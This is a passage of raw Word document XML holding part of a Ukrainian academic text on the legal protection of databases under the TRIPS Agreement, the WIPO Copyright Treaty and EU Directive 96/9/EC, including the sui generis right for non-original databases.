        <w:t>1.3.2 Угода ТРІПС</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="62443D1A" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="003B780E" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EE904C1" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Важливою з точки зору правової охорони бази даних є Угода ТРІПС. Дана угода спрямована на подальше формування універсального правового механізму з охорони інтелектуальної власності у сфері міжнародних торгових відносин. Одним із завдань Угоди ТРІПС є забезпечення ефективними і належними засобами захисту прав інтелектуальної власності, пов’язаних з торгівлею, з урахуванням особливостей національного законодавства країни-учасниці [4].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C68590B" w14:textId="64CF13F2" w:rsidR="00BA24D7" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>В Угоді про торговельні аспекти права інтелектуальної власності (Угода ТРІПС) збіркам та базам даних присвячено п. 2 ст. 10. Зберігає Угода ТРІПС і критерій оригінальності твору: збірка (компіляція) повинна за добором або організацією матеріалу бути результатом інтелектуальної творчості. Враховуючи, що Угода ТРІПС була прийнята майже через століття після Бернської конвенції, її положення більш точно відображають сучасну ситуацію. В тексті Угоди ТРІПС згадуються вже не «збірки творів», а «компіляції даних або інших матеріалів». Введення положення про незалежність прав автора компіляцій від авторських прав на включені в неї дані або матеріали забезпечило визнання самостійного характеру прав автора збірки або бази даних. Стаття 10 Угоди ТРІПС поширює правову охорону на компіляції даних, що існують як у машинозчитуваній (електронній), так і в іншій формі. В Угоді ТРІПС розглядаються нові форми збірки – машино</w:t>
      </w:r>
      <w:r w:rsidR="002C13E9" w:rsidRPr="0001493A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>зчитувані. Замість терміна «збірник» в Угоді ТРІПС використовується його сучасний синонім – «компіляція даних чи інших матеріалів»</w:t>
      </w:r>
      <w:r w:rsidR="002C13E9" w:rsidRPr="002C13E9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [4]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2D01CB" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BAA99E5" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="001676E9" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc516752118"/>
      <w:bookmarkStart w:id="16" w:name="_Toc30433102"/>
      <w:r w:rsidRPr="001676E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1.3.3 Договір ВОІВ з авторського права</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="1ADEB52B" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="003B780E" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CD8F754" w14:textId="5C20FA26" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>20 грудня 1996 р. в Женеві було укладено Договір ВОІВ з авторського права (далі – Договір ВОІВ). Договір ВОІВ укладено відповідно до Бернської конвенції та спрямовано на надання більш широких прав авторам країн-учасниць. Пункт (1) ст. 1 Договору ВОІВ встановив, що Договір є спеціальною угодою в розумінні ст. 20 Бернської конвенції про охорону літературних і художніх творів щодо країн-учасниць, які є країнами Союзу, заснованого Конвенцією. Одним із об’єктів, що охороняється авторським правом, є компіляції даних (бази даних). Стаття 5 Договору ВОІВ «Компіляції даних (бази даних)» передбачає, що компіляції даних або іншої інформації в будь-якій формі, які за підбором або розташуванням змісту є результатом інтелектуальної творчості, охороняються як такі. Охорона не поширюється на самі дані або інформацію і не зачіпає будь-яке авторське право, що стосується самих даних або інформації, які містяться в базі даних</w:t>
      </w:r>
      <w:r w:rsidR="0096070A" w:rsidRPr="0096070A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [5]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A954102" w14:textId="773D12B0" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Можна зазначити, що  визначення «машино</w:t>
      </w:r>
      <w:r w:rsidR="002C13E9" w:rsidRPr="002C13E9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>зчитувана» форма замінено на більш лаконічний, але водночас і більш широкий за змістом вираз «в будь-якій формі». Таким чином, норми зазначених міжнародних актів покладають на країни-учасниці зобов’язання охороняти збірки, до числа яких відносять і бази даних, як складені об’єкти авторського права, за умови відповідності їх критерію оригінальності</w:t>
      </w:r>
      <w:r w:rsidR="0096070A" w:rsidRPr="0096070A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [5]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEBCE5B" w14:textId="545D4CBA" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>У зв’язку з розвитком міжнародної торгівлі результатами інтелектуальної, творчої діяльності проблема гармонізації нормативної бази різних країн стає все більш актуальною. Зростання обороту та цінності електронних баз даних демонструє очевидну потребу в захисті фінансових вкладень у їх створення. Разом із тим досвід правового вирішення цієї проблеми як на міжнародному, так і на національному рівні залишається суперечливим</w:t>
      </w:r>
      <w:r w:rsidR="0096070A" w:rsidRPr="0096070A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [6]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335850BA" w14:textId="6F3F0074" w:rsidR="00BA24D7" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>На Дипломатичній конференції, яка проходила в Женеві в 1996 р., розглядалася підготовлена ВОІВ «Базова пропозиція щодо основних положень Договору з інтелектуальної власності щодо баз даних». Основна причина, відповідно до якої було прийнято рішення про розробку особливого договору, полягала в прагненні закріпити на міжнародному рівні нову форму охорони бази даних шляхом уведення права suigeneris та з метою гармонізації європейського й американського законодавства з охорони бази даних. Проект договору уводив охорону бази даних за умови вкладення істотних людських, фінансових, технічних чи інших інвестицій у збір, організацію, впорядкування, перевірку чи представлення змісту бази даних. База даних розуміється як збірка окремих творів, даних або іншої інформації, систематично або методично організована таким чином, що до них може бути здійснений індивідуальний доступ за допомогою електронних або інших засобів (ст. 2). Пункт 2 ст. 1 передбачає, що правова охорона поширюється на бази даних незалежно від форми, в яких вони втілені. Проте проект договору було розкритиковано, в основному з боку представників США, які висловили серйозні побоювання щодо негативного впливу нового права на сферу науки і культури в цілому. Протистояння проекту виявилося настільки сильним, що прийняття Договору довелося відкласти на невизначений термін. Його так і не було укладено</w:t>
      </w:r>
      <w:r w:rsidR="0096070A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> [7]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABDF0B4" w14:textId="13C814D7" w:rsidR="00BA24D7" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD441B6" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E1DB6FA" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350172A2" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="001676E9" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc516752119"/>
      <w:bookmarkStart w:id="18" w:name="_Toc30433103"/>
      <w:r w:rsidRPr="001676E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1.3.4 Директива ЄС 96/9/ЄС</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="13977437" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="003B780E" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="345220C5" w14:textId="37596650" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Становлення</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> бази даних як об’єкта правової охорони є прийняття 11 березня 1996 р. Директиви Європейського Парламенту і Ради 96/9/ЄС «Про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>правову охорону бази даних» [5]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (далі – Директива ЄС 96/9/ЄС). Її прийняття мотивовано постійно зростаючими обсягами виробленої і оброблюваної в ЄС і в усьому світі інформації у сфері торгівлі та промисловості, а також тим, що відсутність гармонізованого законодавства з охорони бази даних може спричинити важкі економічні наслідки. Відповідно, постало питання про те, норми якого права використовувати при охороні даного об’єкта: авторського права або права suigeneris</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [6]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC007A6" w14:textId="1CCC3430" w:rsidR="00BA24D7" w:rsidRPr="007C39A4" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Як зазначав Б. Едельман, якщо база даних буде вважатися оригінальним твором, то в цьому випадку бажана авторсько-правова охорона, якщо ж база даних не буде відповідати критерію оригінальності, то тут необхідна охорона особливого роду [6]. Директива ЄС 96/9/ЄС поряд з наданням авторсько-правової охорони базі даних, яка за добором або розташуванням їх змісту є результатом інтелектуальної творчості їх авторів (п. 1 ст. 3), вперше встановила спеціальну охорону базі даних (suigeneris), у створення яких було вкладено суттєві фінансові чи інші інвестиції (п. 1 ст. 7). </w:t>
      </w:r>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Відповідно до п. 2 ст. 1 Директиви ЄС 96/9/ЄС база даних – це збірник незалежних творів, даних або інших матеріалів, розташованих систематично або методично і доступних в індивідуальному порядку за допомогою електронних або інших засобів</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [7]</w:t>
      </w:r>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF23C3A" w14:textId="507328D5" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Отже, Директива ЄС 96/9/ЄС передбачає дворівневий правовий режим: за творчими базами даних зберігається їх авторсько-правова охорона у якості літературних складених творів, тоді як будь-які бази даних (включаючи і «нетворчі») за певних умов отримують захист у формі так званого права suigeneris (права «особливого роду») [7]. Обидва правові режими є незалежними, і відповідно одна й та сама база даних може бути кваліфікована і як об’єкт авторського права, і як об’єкт права suigeneris. У європейських країнах прийняття Директиви ЄС 96/9/ЄС було сприйнято неоднозначно, процес імплементації йшов довше, ніж планувалося. І все ж два десятиліття, що сплинуло з дня прийняття Директиви ЄС 96/9/ЄС, показало її необхідність</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [7]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FD5D81" w14:textId="003ABBE4" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Перший рівень охорони розраховано на творчі бази даних, тобто ті, які відповідають вимогам оригінальності. При цьому, виходячи зі змісту ст. 3 Директиви ЄС 96/9/ЄС, «оригінальною» є така база даних, яка через підбір чи впорядкування її змісту становить власне інтелектуальне творіння автора. Ці бази даних захищаються як такі авторським правом. Слід підкреслити, що Директива ЄС 96/9/ЄС не висуває жодних інших критеріїв (поза критерієм оригінальності) для визначення того, чи підлягає база даних авторсько-правовому захисту. Більш того, авторське право на бази даних не поширюється на їх зміст і не перешкоджає жодним правам, які існують стосовно самого змісту</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [8]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F8EEF0" w14:textId="0575444E" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Автором бази даних відповідно до п. 1 ст. 4 Директиви ЄС 96/9/ЄС є фізична особа або група фізичних осіб, які створили цю бази даних, або, якщо законодавство держав-учасниць дозволяє, юридична особа також буде визнана правоволодільцем. Держави-учасниці зобов’язані надати автору такої бази даних виключне право на здійснення чи надання дозволу на здійснення: a) тимчасового або постійного відтворення будь-якими засобами і в будь-якій формі, повністю чи частково; b) перекладу, адаптації, переробки та будь-якої іншої зміни; c) будь-якої форми публічного розповсюдження бази даних чи її копій. Перші продажі в ЄС копії бази даних володільцем прав чи з його згоди вичерпують право на контроль перепродажу цієї копії в межах Співтовариства; d) будь-якого повідомлення, демонстрації чи публічного виконання; e) будь-якого відтворення, розповсюдження, повідомлення, демонстрації чи публічного виконання результатів дій, про які йдеться в пункті b) (ст. 5 Директиви 96/9/ЄС)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Директива 96/9/ЄС закріплює перелік випадків обмеження виключного права автора на базу даних, які країни-учасниці можуть на власний вибір закріплювати в національному законодавстві. Так, країни-учасниці мають можливість обмежити виключне право автора у наступних випадках: a) у разі відтворення неелектронної бази даних для особистих цілей; b) якщо використання відбувається винятково з метою ілюстрування навчання чи наукового дослідження, за умови вказування джерела і якщо це виправдано необхідністю досягнення некомерційних цілей; c) якщо використання відбувається для цілей державної безпеки чи з метою адміністративного провадження або судочинства; d) якщо це пов’язано з іншими винятками з авторського права, які традиційно надаються відповідно до національного законодавства, без шкоди для пунктів (a), (b) і (c). (ст. 6 Директиви 96/9/ЄС13)</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00CE4163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [8]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F33532" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Другий рівень охорони розраховано на всі інші бази даних, які підпадають під правовий режим «особливого права», так званого права suigeneris. Цікаво зазначити, що поняття «suigeneris» латиною означає «єдиний в своєму роді, такий, що не підпадає під установлені типи» [8].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744C87FE" w14:textId="5E6D61E0" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Закріплення «suigeneris» має на меті захистити становище упорядників (виробників) бази даних від незаконного присвоєння результатів фінансового та професійного інвестування, отримання та збирання змісту шляхом захисту всієї бази даних чи її значних частин від певних дій користувача та конкурента; забезпечення захисту будь-якої інвестиції в отримання, перевірку чи надання змісту бази даних на обмежений час дії цього права; враховуючи, що така інвестиція може полягати у використанні фінансових ресурсів та/чи витрачанні часу, зусиль і енергії; надання можливості упоряднику (виробнику) бази даних перешкоджати несанкціонованому витягненню чи повторному використанню всього змісту такої бази даних або його значної частини; враховуючи, що упорядник (виробник) бази даних є особою, яка проявляє ініціативу і йде на ризик, здійснюючи інвестиції; враховуючи, що це виключає субпідрядників із визначення упорядника (виробника)</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [9]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
